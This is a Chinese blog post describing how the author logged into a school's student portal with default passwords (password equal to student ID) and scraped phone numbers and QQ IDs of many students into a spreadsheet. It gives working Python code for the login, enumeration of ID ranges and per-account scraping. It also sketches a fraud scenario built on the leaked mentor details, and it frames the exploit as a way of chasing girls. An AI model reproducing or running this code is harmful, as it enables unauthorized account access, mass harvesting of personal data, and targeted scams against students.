我是如何獲取整個學(xué)校的學(xué)生call和qq(爬蟲),技術(shù)撩妹

前言:

這個沒什么技術(shù)難度,懂爬蟲的人和程序員都可以用學(xué)的語言寫出來
只是很多安全問題的存在,的確影響著我們的生活,
希望大家可以認(rèn)識到一些網(wǎng)站的后臺密碼的規(guī)則與自己的安全性
簡單的說,就是是程序員的懶,讓用戶的信息暴露在互聯(lián)網(wǎng)上
還有一點:
就是希望正在接觸python,和快要放棄學(xué)習(xí)的同學(xué),可以試試換種思路,
來試試爬蟲,這樣有成就感的累積,可以慢慢提升你的自信


爬蟲開始前的準(zhǔn)備:

  • python2.7
  • 庫文件(xlwt,urllib2,BeautifulSoup4,xlrd)
安裝庫文件的方法:

最好在你的python2.7/script/下面打開power shell(可以shift+右擊) 執(zhí)行下面的:

安裝庫文件:
      pip install ***    ***是指上面的庫文件,下面不一定都用,只要上面的,以后出什么錯,你就繼續(xù)pip install 
from bs4 import BeautifulSoup
import requests
import json
import time
import os
import re
from pprint import pprint
import ssl
import cookielib
import urllib2
import urllib
import sys
import xlrd
import xlwt
如何查看自己已經(jīng)安裝了的庫

pip list


觀察網(wǎng)站結(jié)構(gòu)(密碼規(guī)則):

密碼規(guī)則
  • 首先這個規(guī)則是針對大二和已經(jīng)畢業(yè)了的
  • 密碼規(guī)則沒有添加驗證碼(其實添加驗證碼也沒什么用,只是添加了爬取門檻)
  • 規(guī)則是 用戶名==密碼
    符合條件
user_info
  • 這里的用戶信息
  • 不要在意這些細節(jié)(馬賽克) 朦朧美一直是我的追求

具體思路:

模擬登陸 ==》制作學(xué)號規(guī)則==》信息查詢(爬取)==》存入xls

模擬登陸:

因為我們是用爬蟲取信息,每次訪問,

  1. 肯定是登陸了以后才可以訪問我們的信息 ==》模擬登陸
  2. 當(dāng)我們用腳本訪問下一個頁面,需要一個cookie信息,就好比,當(dāng)你打開
    qq空間,其實是想騰訊那里提交了自己的信息,而我們的信息就存在cookie中
  • python 中cookie維持會話訪問:
sys.setdefaultencoding("utf-8")

# ssl這個是驗證證書 https
ssl._create_default_https_context = ssl._create_unverified_context
# 生成一個存儲cookie的對象
c = cookielib.LWPCookieJar()
cookie = urllib2.HTTPCookieProcessor(c)
opener = urllib2.build_opener(cookie)
urllib2.install_opener(opener)

  • 模擬登陸

具體網(wǎng)址不分享,避免帶來不必要的麻煩

    url="http://XXX.xxxx.edu.cn:80/Mobdle/S0s/Login.aspx"
    
    headers={
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
    'Host':'bydg.sjzpt.edu.cn:8080',
    'Referer':'http://XXX.xxxx.edu.cn:80/Mobdle/S0s/Login.aspx'
}
        #這里是post提交的數(shù)據(jù),寫成字典的格式--編碼然后提交
    data= {
        '__VIEWSTATE':'/wEPDwUJNzE4ODIxNTQyZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24xyPtnkTVK5s7OSriVHZGoeBQymQUUjppPK0Se8wDLMqM=',
        'username':username,
        'password':password,
        'ImageButton1.x':'105',
        'ImageButton1.y':'44'
    }
    # req = requests.post(url,headers=headers,data=data)
    # soup = BeautifulSoup(req,'html.parser')
    data=urllib.urlencode(data)  #這里對post 提交的數(shù)據(jù)編碼
    # print data
    html = opener.open(url,data=data).read()   #這里訪問以下網(wǎng)頁,這時候cookie會存到opener里

  • 學(xué)號的列表

不要在意我是怎么知道的,
重要的是這些規(guī)則,你怎么去重新寫一個函數(shù)代入

(里面的我修改過,所以不要套用,以免浪費時間)
# 學(xué)號只在最后3位不一樣,隨機數(shù)xrange() 可以處理更好的處理大的列表
def user_id():
    list_1 = []
    for i in xrange(101,249):
        list_1.append('1131050'+str(i))
    for i in xrange(301,349):
        list_1.append('1131050'+ str(i))
    for i in xrange(401,448):
        list_1.append('1131050'+ str(i))
    for i in xrange(501,548):
        list_1.append('1131050'+ str(i))
    for i in xrange(101,150):
        list_1.append('1131070'+ str(i))
    for i in xrange(101,151):
        list_1.append('1131050'+ str(i))
    for i in xrange(201,252):
        list_1.append('1135050'+ str(i))
    for i in xrange(301,352):
        list_1.append('1131050'+ str(i))
    for i in xrange(401,453):
        list_1.append('1131050'+ str(i))
    for i in xrange(101,148):
        list_1.append('1131070'+ str(i))
    for i in xrange(201,247):
        list_1.append('1131070'+ str(i))

    return list_1


  • 用戶信息的獲取

這里用的的是beautifulsoup庫

def user_info():

    url_info="http://XXX.xxxx.edu.cn:80/Modile/Sys/Meddage/Info.aspx"
    html2 = opener.open(url_info).read()
    
    # python2.7 沒裝lxml的可能會報錯,pip install lxml
    
    soup = BeautifulSoup(html2,"lxml")          #以lxml 方式解析抓下來的lxml
    infos = soup.select("tr > td > span")         # css seletor 來獲取指定標(biāo)簽
    #print profes
    # print infos
    return infos
  • 寫入xls(這個是思路)測試用的函數(shù)

因為在寫的時候因為編碼問題,不能寫入中文

def write_user():
    file2 = xlwt.Workbook(encoding='utf-8')    #打開一個excel,并且編碼格式以  'utf-8'
    table = file2.add_sheet('info',cell_overwrite_ok=True)    #添加一個表
    table.write(0,0,"15d中文3s0")    # 寫入內(nèi)容,table.write(row,col,'value')
    file2.save('file2.xls')

  • 開始行動:

  • 添加上延遲訪問: time.sleep(1)
  1. 因為爬蟲訪問的不和人一樣,訪問會很快,
  2. 這樣可以避免被封ip 還有避免給站點帶來不好的影響
def go_user():
    user_list = []
    user_infos = []
    user_list = user_id()

    file2 = xlwt.Workbook(encoding='utf-8')
    table = file2.add_sheet('info',cell_overwrite_ok=True)
    r = 0  #row  行

    for i in user_list:

        c = 0  #col
        login(username=i, password=i)       #登錄,并傳入列表的學(xué)號
        user_infos = user_info()      #獲取學(xué)號信息,格式是字典
        for i in user_infos[0:10]:       #寫入表單中,循環(huán)把信息寫進去
            # print i.get_text()
            table.write(r,c,i.get_text())
            c += 1
        r += 1
        time.sleep(1)     #延遲訪問,可避免封ip,還有影響服務(wù)器
        print r,c

    file2.save('file2.xls')

程序執(zhí)行結(jié)束:

部分截圖:有圖有真相,避免無知的噴子
學(xué)號規(guī)則很好找的,這樣就獲取半個學(xué)校的call和qq啦,至于能干嘛,自己腦補。。。

end_info

不知道庫的使用方法,我這里總結(jié)了下,還有不知道的只能百度啦

beautifulsoup的使用

xlwt 和 wlrd對excel讀寫操作


總結(jié):

  • 程序員偷懶,驗證碼不設(shè)定,密碼和學(xué)號一樣,簡單的說,是沒有安全概念
    往深的說,是對學(xué)生不負(fù)責(zé)

  • 詐騙思路: --這里我模仿一下騙子

    學(xué)生學(xué)習(xí)里面還有企業(yè)導(dǎo)師,里面有企業(yè)導(dǎo)師的詳細信息,從業(yè)資格證書,詳細到幾幾年獲得
    還有畢業(yè)時間,這么詳細的信息,不就是為騙子準(zhǔn)備的,社工可以獲取企業(yè)導(dǎo)師的習(xí)慣,再和實習(xí)生說出企業(yè)導(dǎo)師的詳細信息,讓你放下戒備,然后,開始騙錢,涉及到公司,再結(jié)合讓你走公司資金(前提你是財務(wù))。。。。。。

    學(xué)校要這么詳細的信息,還這么不注重安全,向錢看的目標(biāo)是不能變,但是,更細致的為學(xué)生考慮好,會不會帶來更好的聲譽吶,值得深思
    
  • 看見的同學(xué)請修改下密碼,避免沒必要的麻煩(有必要麻煩轉(zhuǎn)發(fā)下,至少我們一起努力過)

喜歡作者的可以關(guān)注下,定期更新

往期文章:
通過內(nèi)網(wǎng)截取女神正在瀏覽的照片(需要kali)
央視播放攝像頭被破解--的遺留問題(安全在人性)
通過人性的特點,破解用戶的密碼(社工)
利用好網(wǎng)絡(luò)資源,提升自己的生活體驗
查找好友的具體位置 (更多方法)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

推薦閱讀更多精彩內(nèi)容

  • Android 自定義View的各種姿勢1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 172,829評論 25 708
  • [TOC] 說明 本文介紹使用zxing來生成和解析二維碼。 maven坐標(biāo)如下: 1 zxing生成二維碼示例 ...
    hylexus閱讀 482評論 0 2
  • 文/小番茄 山頂上 荊條樹 在開花 但也有花瓣 在風(fēng)里落 下山的人 抽動鼻子 聞 豎起耳朵 聞 她忘了 已經(jīng) 從山...
    花落溪閱讀 282評論 0 0
  • 一場說走就走的旅行 不刻意看凌亂繁蕪的風(fēng)景 不刻意回避喧鬧繁華的街市 不冷落清冷幽靜的院落 享受那份孤獨和緩慢 就...
    藍日楊閱讀 184評論 2 1
  • ##our dream ###this is never done Dream Ffffff
    pilgrim閱讀 170評論 0 0